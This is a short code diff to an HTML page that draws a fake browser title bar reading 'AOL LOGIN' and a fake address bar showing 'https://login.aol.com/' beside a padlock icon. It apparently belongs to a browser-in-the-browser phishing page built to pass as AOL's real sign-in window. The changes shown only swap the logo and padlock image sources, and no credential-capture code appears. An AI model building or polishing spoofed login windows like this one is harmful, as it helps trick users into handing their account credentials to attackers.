--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
 <div id="title-bar-width">
 	<div id="title-bar">
 		<div style="margin-top:5px;">
-			<img src="https://picsvg.com/svg/Lnn3Ni.jpg" width="20px" height="15px" id="logo">
+			<img src="logo.svg" width="20px" height="15px" id="logo">
 			<span id="logo-description">AOL LOGIN</span>
 		</div>
 
@@ -23,7 +23,7 @@
 		</div>
 	</div>
 	<div id="url-bar">
-		<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
+		<img src="https://picsvg.com/svg/Lnn3Ni.jpg" width="20px" height="20px" id="ssl-padlock">
 		<span id="domain-name"></span>
 		<span id="domain-path">https://login.aol.com/</span>
 	</div>
